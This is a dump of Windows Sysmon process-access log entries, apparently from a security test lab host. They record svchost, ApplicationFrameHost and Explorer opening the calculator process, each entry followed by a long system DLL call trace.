22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362180Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362179Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362178Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362177Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362176Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362175Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362174Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362173Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362172Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362171Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362170Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362169Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362168Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362167Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362166Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362165Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.601{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362164Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362163Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362162Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362161Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362160Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362159Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 